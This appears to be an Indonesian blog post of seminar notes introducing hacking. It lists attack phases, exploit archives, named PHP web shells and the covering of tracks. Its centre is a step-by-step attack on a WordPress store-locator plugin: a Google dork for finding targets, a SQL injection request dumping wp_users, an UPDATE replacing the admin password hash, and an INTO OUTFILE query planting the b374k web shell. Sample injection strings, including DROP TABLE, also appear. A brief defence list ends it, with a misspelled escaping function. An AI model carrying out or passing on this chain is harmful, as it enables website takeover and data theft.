Pengenalan Hacking
ethical hackerkeamanan komputer menjadi penting -->
- Perkembangan komputer
- Ketergantungan manusia
- Tuntutan kompleksitas semakin tinggi
- Keamanan menjadi anak tiri
- Kemampuan orang disebut hacker menjadi menurun
- Kemampuan rendah bisa menjadi ancaman tinggi untuk kepentingan umum
Terminologi hacker
- Vulnerability
- Threat
- Attack
- Exploit
Contoh Situs yang Menyediakan Exploits
- Confidentiality
- Keamanan informasi data untuk diketahui atau dibaca oleh pihak yang tidak dikehendaki
- Integrity / integritas
- Keamanan informasi data untuk menghindari adanya perubahan yang tidak dikehendaki
- Availability
- Keamanan informasi data untuk ketersediaan atau keberadaannya
Triangle Keamanan
Pengelompokkan Hacker
- Black Hat Hacker
- White Hat Hacker
- Grey Hat Hacker
- Suicide Hacker
Tahapan Aktifitas Hacking
- Reconnaissance
- Reconnaissance Passive
- Pencarian data target di google
- Pencarian data target di berbagai jejaring sosial
- Reconnaissance Active
- HTTP Fingerprint
- Scanning
- Pencarian exploit berdasarkan scanning
- Google.com
- Archive Milw0rm
- Archive Exploit DB
- Metasploit Framework
- Darkc0de
- Gaining Acces
- Exploitasi Remote Execution pada celah keamanan OS
- Exploitasi
Remote Execution pada celah keamanan
aplikasi
- Exploitasi Remote Execution pada celah keamanan web
- Maintaining acces
- PHP Backdoor
- Simple php shell
- R57
- C99 / C100
- ASP Backdoor
- B374K
- Covering Tracks
- Pembersihan berbagai exploit atau software yang diupload
- Pembersihan jejak disesuaikan dengan penggunaan aplikasi di target dan ke target.
Konsep (SQL Injection)
GET dan POST- GET : www.site.com/form.php?nama=zae
- POST : www.site.com/form.php
- Langsung dari URL
- http://localhost/ict2013/materi/nilai GET.html
- Header : Content-Type: application/x-www-form-urlencoded
- Data : variable=value
- http://localhost/ict2013/materi/nilai POST.html
- $query = "SELECT*FROM contoh WHERE nama='$username'";
- $username = dari GET atau POST
- $query = "SELECT namaTabel FROM contoh WHERE nama='$username'";DROP TABLE namaTable;--'
- $query = "SELECT namaTable FROM contoh WHERE nama='terserah'OR'x' = 'x'";
DEMO WEB HACKING - (Wordpress Plugins - Google Maps via Store Locator Plus Multiple Vulnerability)
Vulnerability Info- Description : Wordpress Plugins - Google Maps via Store Locator Plus Multiple Vulnerability
- Version : 2.7.1 - 3.0.1
- Link : http://wordpress.org/extend/plugins/store-locator-le/
- Plugins : http://downloads.wordpress.org/plugin/store-locator-le.3.0.1.zip
- Date : 26-05-2012
- Google dork : inurl: /wp-content/plugins/store-locator-le/
- Author : Sammy FORGIT - sam at opensyscom dot fr - http://www.opensyscom.f
- http://www.exemple.com/wordpress/wp-content/plugins/store-locator-le/downloadcsv.php
POST Method, Advanced REST Client
- URL : http://localhost/demo/wp-content/plugins/store-locator-le/downloadcsv.php
- Method : POST
- Header : Content-Type: application/x-www-form-urlencoded
- Data : query=[injection]
- Contoh: query=SELECT * FROM wp_users
Mengatasi Teka-Teki Hash
UPDATE - replace password
UPDATE wp_users SET user_pass = '$P$BAu2rgOUahu8hibdJ12ToW4zu6b.XB.' WHERE `wp_users`.`ID` =1 LIMIT 1 ;____________________________________________
Upload b374k via Query
SELECT ’[kode script]’ INTO OUTFILE
“e:/AppServ/www/ict2013/exploit.php”
http://localhost/ict2013/wp-content/plugins/store-locator-le/core/load_wp_config.php
+
diganti %2B____________________________________________
Base 64 Encryption
Base64 adalah istilah umum untuk sejumlah skema pengkodean serupa yang mengkodekan data biner dan menerjemahkannya ke dalam representasi basis 64. Istilah Base64 berasal dari konten pengkodean MIME tertentu. (Wikipedia, 2010)____________________________________________
Pengamanan
- Update CMS, plugin
- Menggunakan mysql_read_escape_string()
- Memberikan validasi pada setiap inputan
- Berikan length limit pada inputan
- Setting php.ini
- dll..
======================================
* see you *
===================================
Tidak ada komentar:
Posting Komentar